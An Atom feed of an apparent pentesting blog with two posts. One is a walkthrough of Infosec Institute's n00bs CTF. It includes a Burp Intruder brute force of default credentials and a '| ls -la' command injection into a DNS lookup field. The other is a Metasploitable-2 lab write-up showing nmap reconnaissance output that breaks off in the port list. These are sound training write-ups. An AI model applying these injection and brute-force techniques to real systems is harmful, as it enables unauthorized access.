atom.xml

<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">

  <title><![CDATA[CBE-Pentester]]></title>
  <link href="http://tecraksa.github.io/atom.xml" rel="self"/>
  <link href="http://tecraksa.github.io/"/>
  <updated>2015-03-18T12:48:50+05:30</updated>
  <id>http://tecraksa.github.io/</id>
  <author>
    <name><![CDATA[D.S.Sellva Manoj]]></name>
    
  </author>
  <generator uri="http://octopress.org/">Octopress</generator>

  
  <entry>
    <title type="html"><![CDATA[N00bs CTF]]></title>
    <link href="http://tecraksa.github.io/blog/2015/03/15/n00bs-ctf/"/>
    <updated>2015-03-15T21:02:18+05:30</updated>
    <id>http://tecraksa.github.io/blog/2015/03/15/n00bs-ctf</id>
    <content type="html"><![CDATA[<p><p>n00bs CTF (Capture the Flag) Labs is a web application presented by Infosec Institute. It has 15 mini Capture the Flag challenges intended for beginners and newbies in the information security field or for any average infosec enthusiasts who haven’t attended hacker conventions yet.</p>

<p>So what is a CTF? In hacker conventions, CTF or Capture the Flag is a game event which has challenges that vary from exploitation, CrackMes, crypto, forensic, web security, logical games, wireless security, and many more.</p>

<ul>
<li><strong>Start Capturing the Flag [<a href="http://ctf.infosecinstitute.com">n00bs CTF by Infosec Institute</a>]</strong></li>
</ul>


<p><img src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/030915_2304_n00bsCTFLab1.png"></p>

<p>Each level can be hopped in the navigation bar of the web application where different kinds of challenges are in place which include basic static source code analysis for a page, file analysis, steganography, pcap (packet capture) analysis, and other basic forensics challenges.</p>

<p>Here are the Write-up&rsquo;s For all the CTF Levels ranging from [1 - 15]. Kindly comment if there is any changes to be done&hellip;. Thank you guys Happy Hunting!&hellip;</p>

<ul>
<li><strong>Author: [D.S.Sellva Manoj]</strong></li>
<li><strong>Series: [<a href="http://ctf.infosecinstitute.com">n00bs CTF by Infosec Institute</a>]</strong></li>
</ul>


<h2>Tools Used</h2>

<ul>
<li>Kali Linux [Can be found in kali.org]</li>
<li>BurpSuite Pro [Can be found in portswigger.net]</li>
<li>Morse-Code Translator [<a href="http://morsecode.scphillips.com/translator.html">http://morsecode.scphillips.com/translator.html</a>]</li>
<li>BarCode Decoder [<a href="http://online-barcode-reader.inliteresearch.com/default.aspx">http://online-barcode-reader.inliteresearch.com/default.aspx</a>]</li>
<li>ROT-13 Decoder  [<a href="http://www.decode.org/">http://www.decode.org/</a>]</li>
<li>Hex,ASCII, Reverse String Decoder [<a href="http://string-functions.com/">http://string-functions.com/</a>]</li>
<li>Cryto Decoder [<a href="http://crypo.in.ua/tools/">http://crypo.in.ua/tools/</a>]</li>
</ul>


<h2>Level-1</h2>

<h2>Walkthrough</h2>

<p><img src="http://i.imgur.com/BkcR8y0.png"></p>

<p><p>After Reading the CTF Rules with an energy we entered into <code>Level-1</code> to find our first Flag. At <code>level-1</code>, We found an little Alien Image and a description <code>May the source be with you!</code>. Initially we didnt notice the hint <code>source</code>, we booted Burp-suite and crafted the request and sent to the Repeater module and hitted <code>go</code> button and in some miliseconds we got response as shown in below image</p>

<p><img src="http://i.imgur.com/Xv5R0Oe.png"></p>

<p><p>If you see the response, we got an 200 ok and also if you  notice the Raw response, you will find a Commented line as <code>&lt;!-- infosec_flagis_welcome --&gt;</code>. Later we manually went into all levels and did a <code>View Page Source</code> none of the levels were having this comment header at the starting. Isn&rsquo;t this Cool!!!! Finally we conclude that the commented header is the Level-1 Flag.</p>

<ul>
<li><strong>CTF Flag for Level-1: [infosec_flagis_welcome]</strong></li>
</ul>


<h2>Level-2</h2>

<h2>Walkthrough</h2>

<p><img src="http://i.imgur.com/xnnyEWA.png"></p>

<p><p>Level-2 was having some broken image file. Here is how we got the Level-2 Flag. First we Crafted the request into Burp which as shown below</p>

<p><img src="http://i.imgur.com/Qn9QuZL.png"></p>

<p><p>After crafting the request we Forwarded it to Craft on the next request,</p>

<p><img src="http://i.imgur.com/DNQ5d27.png"></p>

<p><p>Where we found a GET Reuqest named <code>Leveltwo.jpeg</code> file which was broken. Then we sent the GET request to Repeater, where we got repsonse along with some Base64 encoded value as shown in below Image.</p>

<p><img src="http://i.imgur.com/KvRorbH.png"></p>

<p><p>Later on getting response, our personal intension is to gain a Flag!!! So we were having a doubt!!! why we got response with a Base64 value?, so to clear our doubt we cpoied the Base64 value and Decoded it using Burp Decoder and this <code>infosec_flagis_wearejuststarting</code> was the decoded value. Successfully we gained the Level-2 FLag.</p>

<p><img src="http://i.imgur.com/CZTgo0a.png"></p>

<ul>
<li><strong>CTF Flag for Level-2: [infosec_flagis_wearejuststarting]</strong></li>
</ul>


<h2>Level-3</h2>

<h2>Walkthrough</h2>

<p><img src="http://i.imgur.com/Mz5fRDs.png"></p>

<p><p>To be frank im a great fan of QR Code scanning. So..So.. after entering into level-3 we scanned the shown QR code using our Samsung S5, where it popped us nothing found/matched. But We didnt give up so we googled for some online Barcode Reader/Decoder and found a link for decoding the QR code. So we downloaded the QR code and uploaded into the online Reader/Decoder to find what&rsquo;s inside the QR code.</p>

<p><img src="http://i.imgur.com/YwTox0c.png"></p>

<p>The online Reader/Decoder Decoded the QR value and we found Morse coding values. So We again found a site for More Translator for Transalating the Vlaues which is shown below</p>

<p><img src="http://i.imgur.com/7USil9m.png"></p>

<p>After translating the Morse Code we were stumbelled with the result!!!!! the QR Image was embedded with Level-3 Flag <code>INFOSECFLAGISMORSING</code> Voila we finally got the flag.</p>

<ul>
<li><strong>CTF Flag for Level-3: [INFOSECFLAGISMORSING]</strong></li>
</ul>


<h2>Level-4</h2>

<h2>Walkthrough</h2>

<p><img src="http://i.imgur.com/mXLQMcI.png"></p>

<p><p>Poping into Level -4. When we loaded the page there was a image along with a description same was in <code>Level-1</code>. We deeply observed the Description, which mentions the <code>HTTP</code> expansion and when we did a mouseover on the image it was alerting us <code>stop poking me</code>, so we loaded the Burp and intercepted the levelfour.php page request and sent it to repeater where we got a response along with a Cookie value named <code>Set-Cookie</code>. This seems unusual because if you see the request page at left side you could notice the same Cookie value assigned for levelfour.php. So each and every time if you load the page your cookie values gets changed but this value was stable and unique. After our analysis,  we copied the Cookie value and pasted it in the Burp -> Decoder and did a smartdecode and manual decode there but nothing was reflected. Basically If you do any encryption the underscore will also be encrypted but in this case underscore remains the same. So we did some Cryptanalysis and found the strings were substituted based on ROT-13 algorithm where the underscores are not considered to rotate 13 chars. So we cracked the Value using online ROT-13 online Decoder and successfully gained the Flag <code>infosec_flagis_welovecookies</code>.</p>

<p><img src="http://i.imgur.com/hjandI6.png"></p>

<p><img src="http://i.imgur.com/cAVihm7.png"></p>

<ul>
<li><strong>CTF Flag for Level-4: [infosec_flagis_welovecookies]</strong></li>
</ul>


<h2>Level-5</h2>

<h2>Walkthrough</h2>

<p><p>Initially when we visit the levelfive.php page an xss alert were kept on popping up. So what we did is we marked a tick on <code>check</code> box  for <code>Prevent this page from creating additional dialogs</code>.</p>

<p><img src="http://i.imgur.com/m6LKR3s.png"></p>

<p>Then after preventing the alert box, we did a Inspect element with Firebug and found a broken image file named <code>aliens.jpg</code> under a folder <code>/img</code>.</p>

<p><img src="http://i.imgur.com/TB82fIV.png"></p>

<p>After finding the image file we donwloaded it and opened to view if there is any flag inside the file. But we were wrong, the image showed us nothig but with some funny character with some text inside the image.</p>

<p><img src="http://i.imgur.com/96dh5yT.png"></p>

<p>Later on we started to analyze the image with may commands to grep out the Flag but nothing was working out. And if you notice that the image was not having any metadata listed, no author name, iso rating , focal length etc&hellip;. after noticing this we thought that this image might be a stegno image. So we went online for decoding the stegno image</p>

<p><img src="http://i.imgur.com/igKiDXF.png"></p>

<p><img src="http://i.imgur.com/xZTwYKq.png"></p>

<p>If you notice the second image you could see some lengthy binary bits which confirms that the image contains some text inside. We doubted correctly!!!! the alien.jpg image is a Stegno image. After our confirmation we copied the binary value and and converted the binary to string to gain the Level-5 flag <code>infosec_flagis_stegaliens</code></p>

<p><img src="http://i.imgur.com/zdvfjkU.png"></p>

<ul>
<li><strong>CTF Flag for Level-5: [infosec_flagis_stegaliens]</strong></li>
</ul>


<h2>Level-6</h2>

<h2>Walkthrough</h2>

<p><img src="http://i.imgur.com/lUNKoWb.png"></p>

<p><p>At Level-6 we downloaded a .pcap file which was named as <code>sharkfin.pcap</code>. After Downloading the file we opened the file using Wireshark in Kali-linux and to be really frank we had some luck, because to analyze a .pcap file you need to be very patience. The luck here was, after we opened the file we made a right click on the first packet stream and did a Followup UPD stream. After doing this we got some HEX values with 44bytes long.</p>

<p><img src="http://i.imgur.com/597Bt0L.png"></p>

<p>Then after the followup stream we copied those Hex values and made a Hex to Char conversion online and the converted strings was the Level-6 CTF flag <code>infosec_flagis_sniffed</code>.</p>

<p><img src="http://i.imgur.com/NRZGnTS.png"></p>

<ul>
<li><strong>CTF Flag for Level-6: [infosec_flagis_sniffed]</strong></li>
</ul>


<h2>Level-7</h2>

<h2>Walkthrough</h2>

<p><img src="http://i.imgur.com/N2WEvCt.png"></p>

<p><p>When we initally browsed to Level-7 the page was blank with a description and with the bounty value as shown in above image. Later we noticed the url i.e. 404.php so we thought the page is being redirected, whenever we click the level-7 tab in levels() page. But this was not the case. Initally we dropped and moved on to later levels and  we found the levelseven.php at level-15 from <code>/var/www/html</code> which is shown in below image</p>

<p><img src="http://i.imgur.com/DKHc8uQ.png"></p>

<p>So after finding the levelseven.php page from level-15, we browsed to it and we noticed a blank page as shown in below image</p>

<p><img src="http://i.imgur.com/Nv0wQxI.png"></p>

<p>Later we did a intercept using Burp and we sent the request to the Repeater and noticed the response page with a 200 ok along with a base64 encoded value following up with the HTTP headers. So we decoded the value and Gained the Level-7 Flag <code>infosec_flagis_youfoundit</code></p>

<p><img src="http://i.imgur.com/6nIRd1W.png"></p>

<p><img src="http://i.imgur.com/QXOlaUQ.png"></p>

<ul>
<li><strong>CTF Flag for Level-7: [infosec_flagis_youfoundit]</strong></li>
</ul>


<h2>Level-8</h2>

<h2>walkthrough</h2>

<p><img src="http://i.imgur.com/yGn5Oka.png"></p>

<p><p>Level-8 was a cake walk for me, because of my OSCP Certification currently obtained. Later, we downloaded the <code>app.exe</code> file and decompiled the app.exe file using <code>OBJDUMP</code> and gained the Level-8 flag <code>infosec_flagis_0x1a</code></p>

<p><img src="http://i.imgur.com/lkJYFGc.png"></p>

<p><img src="http://i.imgur.com/n6Dp17F.png"></p>

<ul>
<li><p><strong>Note:[To know more abot objdump kidnly refer <code>reverse engineering books</code> available from Amazon.com.]</strong></p></li>
<li><p><strong>CTF Flag for Level-8: [infosec_flagis_0x1a]</strong></p></li>
</ul>


<h2>Level-9</h2>

<h2>Walkthrough</h2>

<p><img src="http://i.imgur.com/wMGBTh3.png"></p>

<p><p>Contains a CISCO WEB -IDS login page. At initial stage we were doing some sql injection attacks nothing was working out. So we thought it this way, that whenever a user is buying a new device it will be preloaded with default username and password. So we created a default Username and passowrd list for doing the automated Bruteforce thing. Later We intercepted the request into Burp and forwarded the request to the Burp-Intruder module, then select the Username and password field and configured wtih the options as shown in below images and then select the Payloads tab and load the Username and password list and hit <code>start-attack</code>.</p>

<p><p>Step 1:</p>

<p><img src="http://i.imgur.com/rqfTp1X.png"></p>

<p><p>Step 2:</p>

<p><img src="http://i.imgur.com/lqbSmCH.png"></p>

<p><p>Step 3:</p>

<p><img src="http://i.imgur.com/xdxKDhp.png"></p>

<p><p>Step 4: [click Start attack]</p>

<p><img src="http://i.imgur.com/fDSs52l.png"></p>

<p><p>After the step 4 process is completed check the Length Field where you will notice the difference about the successful Bruteforce login. For example for username <code>sa</code> and Password <code>Cisco</code> the Length is <code>4083</code> and status code is 200 ok, but don&rsquo;t blindly confirm with the status code check for other values too. So the Original value for the Username and password filed is <code>root</code>: <code>attack</code>. After finding valid user credentials we loaded then manually through the url and see what we found</p>

<p><img src="http://i.imgur.com/TN6E2GV.png"></p>

<p><p>we got an alert box with a Reverse_string value which is actually the Level-9 Flag <code>ssaptluafed_sigalf_cesofni</code> alias <code>infosec_flagis_defaultpass</code></p>

<p><img src="http://i.imgur.com/7aXtzAL.png"></p>

<ul>
<li><strong>CTF Flag for Level-9: [infosec_flagis_defaultpass]</strong></li>
</ul>


<h2>Level-10</h2>

<h2>Walkthrough</h2>

<p><img src="http://i.imgur.com/LR9fTbk.png"></p>

<p><p>You can see the Description when you get-into level-10. <code>what kind of sound is this?</code> so if you notice here <code>sound</code> is the hint. Initally we downloaded the file <code>Flag.wav</code> and we opened it in VLC media player. During the Playback the audio went just like that and we didnt hear it properly, so we went to playback tab and reduced the sound and even though we were not able to get a clear voice. Then we downloaded a wave editor called <code>Wavepad</code> where we reduced the Pitch &amp; Speed under the effects tab. After the reduction we were closely successful! eventhough some noise ratio was there, so again we reduced the speed,pitch and semitones to some extent and made a preview &hellip;. VOila we got a clear audio it vocaled us the Level-10 Flag <code>infosec_flagis_sound</code></p>

<ul>
<li><strong>CTF Flag for Level-10: [infosec_flagis_sound]</strong></li>
</ul>


<h2>Level-11</h2>

<h2>Walkthrough</h2>

<p><img src="http://i.imgur.com/yZHVRqg.png"></p>

<p><p>At the inital stage, after the page got loaded we thought this page has two flags to be captured,.. but after viewing the description there were no sound file inside the page, instead there were two image file <code>lol.gif</code> and <code>php-logo-virus.jpg</code> . How you know?&hellip;.. We did Inspect element on the webpage using Firebug&hellip;.</p>

<p><img src="http://i.imgur.com/y45L36K.png"></p>

<p><p>After the above identification, we downloaded both the files, and started analyze both the image files using UNIX <code>Strings</code> command which will output whatever text from a binary file. So we ran <code>Strings lol.gif | grep infosec</code> &mdash;> nothing reflected, then we moved on to the second image <code>Strings php-logo-virus.jpg | grep infosec</code> &ndash;> where we were reflected with the flag along with base64 values. After Decoding the values we gained a valid url link, so we followed the link it showed us the <code>Powerslide</code> image so my guess for this flag might be <code>infosec_flagis_powerslide</code>.</p>

<p><img src="http://i.imgur.com/lgpjRo0.png"></p>

<p><p>Decoding</p>

<p><img src="http://i.imgur.com/JCC5KkZ.png"></p>

<p><p>Follow up URL</p>

<p><img src="http://i.imgur.com/k6M9LOW.png"></p>

<ul>
<li><strong>CTF Flag for Level-11: [infosec_flagis_powerslide]</strong></li>
</ul>


<h2>Level-12</h2>

<h2>Walkthrough</h2>

<p><img src="http://i.imgur.com/GdzafXD.png"></p>

<p><p> This level made me to drink so many redbull&rsquo;s. For writing the blog is easy but the way we found it was very difficult. Good work by Infosec Team.
Initially if you see this page it will be a look alike of the level-1 page only difference is the Description. <code>Dig Deeper</code> so from here we started to view the page source nothing much was found looks normal. we copied the level-12 source and level-1 source code and made a difference check online</p>

<p><img src="http://i.imgur.com/S0iuzB6.png"></p>

<p>where the difference was in CSS(Cascading Style Sheets) <code>design.css</code>. so we used the Web_developer Firefox_addon to find what&rsquo;s inside the css.</p>

<p><img src="http://i.imgur.com/sTZYiLc.png"></p>

<p>Here if you notice the design.css file contains some unwanted HEX values, where we converted the HEX values into String through online Hex to String Converterfinally we found the Level-12 Flag <code>infosec_flagis_heyimnotacolor</code></p>

<p><img src="http://i.imgur.com/6mPydVg.png"></p>

<ul>
<li><strong>CTF Flag for Level-12: [infosec_flagis_heyimnotacolor]</strong></li>
</ul>


<h2>Level-13</h2>

<h2>Walkthrough</h2>

<p><img src="http://i.imgur.com/4f35E9o.png"></p>

<p><p>When we loaded the level-13 page we didnt even found anyhting to download just a blank page with a huge description. We read the description again and again, what we noticed was that the <code>challege is gone, Can you check if you can find the backup file for this one?</code> blah blah blah &hellip;.. For me again the level-15 helped me, we did a change directory to <code>/var/www/html</code> and found a old file named <code>levelthirteen.php.old</code> as shown in the below image</p>

<p><img src="http://i.imgur.com/He3Bocy.png"></p>

<p>After finding the old file we loaded it into the url and it popped us to download this file.</p>

<p><img src="http://i.imgur.com/OHIwZyA.png"></p>

<p>After the download was successful, we tried to open the file using the Web-browser where we found a page without any css designs as shown below</p>

<p><img src="http://i.imgur.com/YL49f85.png"></p>

<p>If you notice the page you will find a description stating <code>Do you want to download this Mysterious File</code> we gave <code>yes</code> and a newtab was opened along with a new url link ( which was a HREF link)</p>

<p><img src="http://i.imgur.com/rdOsLqp.png"></p>

<p>After getting this link we copied the <code>/misc/imadecoy</code> and downloaded the <code>imadecoy</code> file. Actually the imadecoy file was with blank extension. Basically we use Kali for my official testing purpose after we downloaded the file it automatically opened in wireshark so this was a pcap file ( I was having pure luck). Recently we found an online PCAP web Perfomance Analyzer tool where we uploaded the imadecoy file and started to analyze the file. Where we some GET requests for image files</p>

<p><img src="http://i.imgur.com/tfWBaVl.png"></p>

<p>Then we loaded the same file into wireshark and we downloaded all the files into our local machine and see what we got</p>

<p><img src="http://i.imgur.com/1pm1CpC.png"></p>

<p>We got the level-13 Flag <code>infosec_flagis_morepackets</code></p>

<ul>
<li><strong>CTF Flag for Level-13: [infosec_flagis_morepackets]</strong></li>
</ul>


<h2>Level-14</h2>

<h2>Walkthrough</h2>

<p><img src="http://i.imgur.com/QbmSBJQ.png">
<p> This Level seriously took my breath away because its a Database File where we did some through analysis which took us some 35 minutes. Because to be frank im not a coder or a database admin so it took me so much time. What we found was that while scrolling down each dumping items in Friends table there were some Unicode strings  under <code>name</code> field for <code>id:104</code> of table <code>friends</code>. Usually Db dosent create such value directly!!!!&hellip;.. SOmething Fissssshhhhhy&hellip; we copied the entire string and decoded using online unicode convertor. After Converting Unicode values clean the <code>\</code> before each character.</p>

<p><img src="http://i.imgur.com/tui8GV2.png"></p>

<p><img src="http://i.imgur.com/ThlMlct.png"></p>

<ul>
<li><strong>CTF Flag for Level-14: [infosec_flagis_whatsorceryisthis]</strong></li>
</ul>


<h2>Level-15</h2>

<h2>Walkthrough</h2>

<p><img src="http://i.imgur.com/H5Ny161.png"></p>

<p>This level contains a DNS lookup command which is integrated with <code>Dig</code> command, where it retrives the <code>ns &amp; mx</code> record if you give any domain name inside the dns lookup field. And also if you notice this page is vulnerable to command injection. Initially i did a <code>| ls -la</code> command and saw two file <code>.hey &amp; index.php</code> so i did cat on both the files <code>index.php</code> reflected with the same levelfifteen.php page and <code>.hey</code> gave me some unknown characters <code>Miux+mT6Kkcx+IhyMjTFnxT6KjAa+i6ZLibC</code> and we started to do the decryption using some online decryptor tools.</p>

<p><img src="http://i.imgur.com/9B08Pps.png"></p>

<p><img src="http://i.imgur.com/4NLa2fQ.png"></p>

<p>We Successfully decrypted the Flag using <code>http://crypo.in.ua/</code> online tool. This site contains many Decryption Algorithms. Finally we decrypted the Flag with the help of <code>ATOM-128 Decryptor</code> and the Level-15 Flag is <code>infosec_flagis_rceatomized</code></p>

<p><img src="http://i.imgur.com/ooH9ytU.png"></p>

<p><img src="http://i.imgur.com/IArzw5r.png"></p>

<ul>
<li><strong>CTF Flag for Level-15: [infosec_flagis_rceatomized]</strong></li>
</ul>


<h2>Bonus Flag</h2>

<p>We found this Bonus flag under <code>/var/www</code>.</p>

<p><img src="http://i.imgur.com/N4JPPzW.png"></p>

<p>If you see that there is a <code>img</code>, <code>misc</code> directory where some of the levels were having link to these directories so we enterted those directories to find if something we could find interestingly. From the <code>img</code> diretory we found this <code>17oskq9jniazojpg.jpg</code> jpeg file, so we did many analysis and this image was found to be a stegno image so when we did a stegdecode it was asking me for the passphrase and we tried to crack the passphrase and we were not successful. Then when we found a <code>Readme.wav</code> from the /misc directory which was not related to any level so we downloaded it.</p>

<p><img src="http://i.imgur.com/4h00YQr.png"></p>

<p>After downloading the file we started to listen the wave file using vlc player, initially we heard some Beeping sounds. Initially it didn&rsquo;t strike me that its a Audio Morse code file. After identifying that its Morsecoded file, we decoded the sound value with the help of <code>Morse View</code> a windows based morse code decoder <code>[.. -. ..-. --- ... . -.-. ..-. .-.. .- --. .. ... -- --- .-. ... . -.-. --- -.. . - --- -. . ...]</code>. Finally we got the Bonus Flag <code>Infosec_flagis_morsecodetones</code>.</p>

<ul>
<li><strong>Bonus Flag [Infosec_flagis_morsecodetones]</strong></li>
</ul>


<h2>THE END</h2>
]]></content>
  </entry>
  
  <entry>
    <title type="html"><![CDATA[Metasploitable-2]]></title>
    <link href="http://tecraksa.github.io/blog/2015/03/15/metasploitable-2/"/>
    <updated>2015-03-15T21:01:25+05:30</updated>
    <id>http://tecraksa.github.io/blog/2015/03/15/metasploitable-2</id>
    <content type="html"><![CDATA[<p><p>Metasploitable 2 is virtual machine based on Linux, which contains several vulnerabilities to  exploit using <code>Metasploit</code> framework as well other security tools.</p>

<ul>
<li><strong>Author: [<a href="https://community.rapid7.com">Rapid7</a>].</strong></li>
<li><strong>Series: [Metasploitable].</strong></li>
<li><strong>Release Date: [12 Jun 2012].</strong></li>
<li><strong>Download Link: [<a href="http://download.vulnhub.com/metasploitable/metasploitable-linux-2.0.0.zip.torrent">vulnhub</a>].</strong></li>
</ul>


<h2>Method</h2>

<ul>
<li>Used <strong><em>Netdiscover</em></strong> to identify the target IP of the remote machine.</li>
<li>Used <strong><em>Nmap</em></strong> to Banner grabbed the services running on the open ports.</li>
<li>Used <strong><em>Metasploit</em></strong> to exploit open ports and running services.</li>
<li>Used <strong><em>Netcat</em></strong> for making a reverse shell.</li>
</ul>


<h2>Tools Used</h2>

<ul>
<li>Metasploitable_2 [8825F2509A9B9A58EC66BD65EF83167F]</li>
<li>Netdiscover [Can be found in Kali Linux]</li>
<li>Nmap [Can be found in Kali Linux]</li>
<li>Metasploit [Can be found in Kali Linux]</li>
<li>Netcat [Can be found in Kali Linux]</li>
</ul>


<h2>Walkthrough</h2>

<p><p>As a initial stage we downloaded the vm and imported to VMware Workstation. After successful import, we started to do a discovery
of target ip by running the <code>Netdiscover</code> command.
<figure class='code'><figcaption><span>Netdiscover Output</span></figcaption><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class='ruby'><span class='line'><span class="n">root</span><span class="vi">@Hacker</span><span class="ss">:~</span><span class="c1"># netdiscover -r 192.168.2.0/24</span>
</span><span class='line'><span class="mi">192</span><span class="o">.</span><span class="mi">168</span><span class="o">.</span><span class="mi">2</span><span class="o">.</span><span class="mi">7</span>     <span class="mo">00</span><span class="p">:</span><span class="mi">0</span><span class="ss">c</span><span class="p">:</span><span class="mi">29</span><span class="ss">:fa:dd</span><span class="p">:</span><span class="mi">2</span><span class="n">a</span>    <span class="mo">01</span>    <span class="mo">060</span>   <span class="no">VMware</span><span class="p">,</span> <span class="no">Inc</span><span class="o">.</span>
</span></code></pre></td></tr></table></div></figure>                                                      <br/>
<p> After the discovery of target ip, we ran <code>Nmap</code> to identify the open ports of the target ip. Which gave us
a huge list of port no along with their state (open|closed|filterd), service, and Version.
<figure class='code'><figcaption><span>Nmap Output</span></figcaption><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
</pre></td><td class='code'><pre><code class='ruby'><span class='line'><span class="n">root</span><span class="vi">@Hacker</span><span class="ss">:~</span><span class="c1"># nmap -sS -sV -p 1-10000 192.168.2.7</span>
</span><span class='line'>
</span><span class='line'><span class="no">Starting</span> <span class="no">Nmap</span> <span class="mi">6</span><span class="o">.</span><span class="mi">46</span> <span class="p">(</span> <span class="ss">http</span><span class="p">:</span><span class="sr">//nm</span><span class="n">ap</span><span class="o">.</span><span class="n">org</span> <span class="p">)</span> <span class="n">at</span> <span class="mi">2014</span><span class="o">-</span><span class="mi">08</span><span class="o">-</span><span class="mi">24</span> <span class="mi">09</span><span class="p">:</span><span class="mi">32</span> <span class="no">IST</span>
</span><span class='line'><span class="no">Nmap</span> <span class="nb">scan</span> <span class="n">report</span> <span class="k">for</span> <span class="mi">192</span><span class="o">.</span><span class="mi">168</span><span class="o">.</span><span class="mi">2</span><span class="o">.</span><span class="mi">7</span>
</span><span class='line'><span class="no">Host</span> <span class="n">is</span> <span class="n">up</span> <span class="p">(</span><span class="mi">0</span><span class="o">.</span><span class="mo">00011</span><span class="n">s</span> <span class="n">latency</span><span class="p">)</span><span class="o">.</span>
</span><span class='line'><span class="no">Not</span> <span class="ss">shown</span><span class="p">:</span> <span class="mi">9974</span> <span class="n">closed</span> <span class="n">ports</span>
</span><span class='line'><span class="no">PORT</span>     <span class="no">STATE</span> <span class="no">SERVICE</span>     <span class="no">VERSION</span>
</span><span class='line'><span class="mi">21</span><span class="o">/</span><span class="n">tcp</span>   <span class="nb">open</span>  <span class="n">ftp</span>         <span class="n">vsftpd</span> <span class="mi">2</span><span class="o">.</span><span class="mi">3</span><span class="o">.</span><span class="mi">4</span>
</span><span class='line'><span class="mi">22</span><span class="o">/</span><span class="n">tcp</span>   <span class="nb">open</span>  <span class="n">ssh</span>         <span class="no">OpenSSH</span> <span class="mi">4</span><span class="o">.</span><span class="mi">7</span><span class="n">p1</span> <span class="no">Debian</span> <span class="mi">8</span><span class="n">ubuntu1</span> <span class="p">(</span><span class="n">protocol</span> <span class="mi">2</span><span class="o">.</span><span class="mi">0</span><span class="p">)</span>
</span><span class='line'><span class="mi">23</span><span class="o">/</span><span class="n">tcp</span>   <span class="nb">open</span>  <span class="n">telnet</span>      <span class="no">Linux</span> <span class="n">telnetd</span>
</span><span class='line'><span class="mi">25</span><span class="o">/</span><span class="n">tcp</span>   <span class="nb">open</span>  <span class="n">smtp</span>        <span class="no">Postfix</span> <span class="n">smtpd</span>
</span><span class='line'><span class="mi">53</span><span class="o">/</span><span class="n">tcp</span>   <span class="nb">open</span>  <span class="n">domain</span>      <span class="no">ISC</span> <span class="no">BIND</span> <span class="mi">9</span><span class="o">.</span><span class="mi">4</span><span class="o">.</span><span class="mi">2</span>
</span><span class='line'><span class="mi">80</span><span class="o">/</span><span class="n">tcp</span>   <span class="nb">open</span>  <span class="n">http</span>        <span class="no">Apache</span> <span class="n">httpd</span> <span class="mi">2</span><span class="o">.</span><span class="mi">2</span><span class="o">.</span><span class="mi">8</span> <span class="p">((</span><span class="no">Ubuntu</span><span class="p">)</span> <span class="no">DAV</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span>
</span><span class='line'><span class="mi">111</span><span class="o">/</span><span class="n">tcp</span>  <span class="nb">open</span>  <span class="n">rpcbind</span>     <span class="mi">2</span> <span class="p">(</span><span class="no">RPC</span> <span class="c1">#100000)</span>
</span><span class='line'><span class="mi">139</span><span class="o">/</span><span class="n">tcp</span>  <span class="nb">open</span>  <span class="n">netbios</span><span class="o">-</span><span class="n">ssn</span> <span class="no">Samba</span> <span class="n">smbd</span> <span class="mi">3</span><span class="o">.</span><span class="n">X</span> <span class="p">(</span><span class="ss">workgroup</span><span class="p">:</span> <span class="no">WORKGROUP</span><span class="p">)</span>
</span><span class='line'><span class="mi">445</span><span class="o">/</span><span class="n">tcp</span>  <span class="nb">open</span>  <span class="n">netbios</span><span class="o">-</span><span class="n">ssn</span> <span class="no">Samba</span> <span class="n">smbd</span> <span class="mi">3</span><span class="o">.</span><span class="n">X</span> <span class="p">(</span><span class="ss">workgroup</span><span class="p">:</span> <span class="no">WORKGROUP</span><span class="p">)</span>
</span><span class='line'><span class="mi">512</span><span class="o">/</span><span class="n">tcp</span>  <span class="nb">open</span>  <span class="nb">exec</span>        <span class="n">netkit</span><span class="o">-</span><span class="n">rsh</span> <span class="n">rexecd</span>
</span><span class='line'><span class="mi">513</span><span class="o">/</span><span class="n">tcp</span>  <span class="nb">open</span>  <span class="n">login?</span>
</span><span class='line'><span class="mi">514</span><span class="o">/</span><span class="n">tcp</span>  <span class="nb">open</span>  <span class="n">tcpwrapped</span>
</span><span class='line'><span class="mi">1099</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">rmiregistry</span> <span class="no">GNU</span> <span class="no">Classpath</span> <span class="n">grmiregistry</span>
</span><span class='line'><span class="mi">1524</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">shell</span>       <span class="no">Metasploitable</span> <span class="n">root</span> <span class="n">shell</span>
</span><span class='line'><span class="mi">2049</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">nfs</span>         <span class="mi">2</span><span class="o">-</span><span class="mi">4</span> <span class="p">(</span><span class="no">RPC</span> <span class="c1">#100003)</span>
</span><span class='line'><span class="mi">2121</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">ftp</span>         <span class="no">ProFTPD</span> <span class="mi">1</span><span class="o">.</span><span class="mi">3</span><span class="o">.</span><span class="mi">1</span>
</span><span class='line'><span class="mi">3306</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">mysql</span>       <span class="no">MySQL</span> <span class="mi">5</span><span class="o">.</span><span class="mi">0</span><span class="o">.</span><span class="mi">51</span><span class="n">a</span><span class="o">-</span><span class="mi">3</span><span class="n">ubuntu5</span>
